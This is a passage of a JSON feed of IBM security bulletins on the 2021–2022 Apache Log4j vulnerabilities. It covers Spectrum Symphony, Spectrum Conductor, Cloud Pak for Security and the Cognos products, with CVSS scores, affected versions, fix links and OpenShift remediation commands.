Symphony\"},\"Component\":\"GUI\\/PERF\\/ELK\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Edition\":\"7.3.2;7.3.1;7.3;7.2.1;7.2.0.2\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:51:34", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Symphony is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:51:34", "id": "5662007982BBB6B88D91C6C7393CC2022D9415D2290FD0DA76D55E99204FFF35", "href": "https://www.ibm.com/support/pages/node/6539410", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T23:47:17", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Conductor for generating logs in some of its components such as ELK, ascd, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS4H63\",\"label\":\"IBM Spectrum Conductor\"},\"Component\":\"ASCD\\/PMC\\/Explorer\\/conductorspark\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.5.1;2.5.0;2.4.1\",\"Edition\":\"2.5.1;2.5.0;2.4.1\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:42:40", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Conductor is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:42:40", "id": "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "href": "https://www.ibm.com/support/pages/node/6541736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:57:36", "description": "## Summary\n\nCloud Pak for Security (CP4S) v1.9.0.0 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated versions of CP4S images. Please see remediation steps below to apply fix. All customers are encouraged to act quickly to update their systems. Please note, this security bulletin has been superseded by Security Bulletin: Cloud Pak for Security is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046) - see https://www.ibm.com/support/pages/node/6541156. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \nCloud Pak for Security (CP4S)| 1.7.2.0 \n \n## Remediation/Fixes\n\n**For Cloud Pak for Security 1.8.x and 1.9.x :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\n \noc login <openshift_url> -u <username> -p <password> \n \nUsing a token:\n\n \noc login --token=<token> \\--server=<openshift_url> \n \n \nCheck the current value of `imagePullPolicy` using the command : \n \noc get -n <CP4S_NAMESPACE> cp4sthreatmanagement threatmgmt -o yaml | grep imagePullPolicy: \n \nIf `imagePullPolicy` is not set to \"Always\" : \n \noc patch -n <CP4S_NAMESPACE> cp4sthreatmanagement threatmgmt --type merge --patch '{\"spec\":{\"extendedDeploymentConfiguration\":{\"imagePullPolicy\":\"Always\"}}}' \n \nElse, if the `imagePullPolicy` value is already set to \"Always\" : \n \noc delete pod -lsequence=idrmapp -n <CP4S_NAMESPACE> \n \nAfter executing either of the above commands the pods will restart which can be monitored using : \n \noc get pods -n <CP4S_NAMESPACE> -w** \n \n** \n\n\n**For Cloud Pak for Security 1.7.2.0 :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\noc login <openshift_url> -u <username> -p <password> \n\n\nUsing a token:\n\noc login --token=<token> \\--server=<openshift_url>\n\nSelect your CP4S namespace :\n\noc project _<CP4S_NAMESPACE>_\n\nCheck the current value of `imagePullPolicy` : \n\noc get iscinventory iscplatform -o yaml | grep imagePullPolicy:\n\nIf the value of `imagePullPolicy` is not set to \u201cAlways\u201d :\n\noc patch iscinventory iscplatform --type merge --patch '{\"spec\":{\"definitions\":{\"imagePullPolicy\": \"Always\"}}}' && oc delete pod -lname=sequences\n\nElse if the value of the `imagePullPolicy` is already set to \u201cAlways\u201d : \n\no_c delete pod -lsequence=idrmapp_\n\nAfter executing either of the above commands the idrm pods will restart which can be monitored using :\n\noc get pods -w\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nRHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE-2021-44228) (CVE-2021-4104) <https://access.redhat.com/security/vulnerabilities/RHSB-2021-009>\n\nX-Force Database: <https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>\n\nElastic Search: <https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTDPP\",\"label\":\"IBM Cloud Pak for Security\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.9.0.0, 1.8.1.0, 1.8.0.0, 1.7.2.0 \",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T11:34:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Cloud Pak for Security (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-17T11:34:23", "id": "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "href": "https://www.ibm.com/support/pages/node/6527154", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:13:19", "description": "## Summary\n\nIBM Cognos Controller is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Controller as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Controller has upgraded Apache Log4j to v2.17.1. Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.4.2\n\n## Remediation/Fixes\n\nIf you have the listed affected version, it is strongly recommended that you apply the most recent security update:\n\n[Download IBM Cognos Controller 10.4.2 IF17 from Fix Central](<https://www.ibm.com/support/pages/node/6540652> \"Download IBM Cognos Controller 10.4.2 IF17 from Fix Central\" )\n\nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\nRemediation for IBM Cognos Controller on Cloud has completed.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Controller team developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers. \n\nTo get the patch and detailed instructions, click this link: [IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around](<https://www-945.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Cognos+8+Controller&release=All&platform=All&function=fixId&fixids=10.4.2.0-BA-CNTRL-Win64-LOG4J-WORK-AROUND:0&includeSupersedes=0&source=fc&login=true> \"IBM Cognos Controller 10.4.2.0 Apache Log4j Work-around\" )\n\nThe patch is applicable to IBM Cognos Controller version 10.4.2. \n\nThe instructions will guide you to replace the log4j vulnerable files manually without impacting your current product version. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: IBM Cognos Controller on Cloud remediation completion in Remediation/Fixes \n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9S6B\",\"label\":\"Cognos Controller\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"10.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T20:04:06", "type": "ibm", "title": "Security Bulletin: IBM Cognos Controller 10.4.2 IF17: Apache Log4j vulnerability (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-15T20:04:06", "id": "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "href": "https://www.ibm.com/support/pages/node/6540664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:57:37", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-45046) vulnerability. IBM Cognos Analytics has upgraded Apache Log4j to v2.16. This update also addresses CVE-2021-44228. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nCVE-2021-45046 and CVE-2021-44228 have been remediated on all IBM Cognos Analytics on Cloud environments.\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 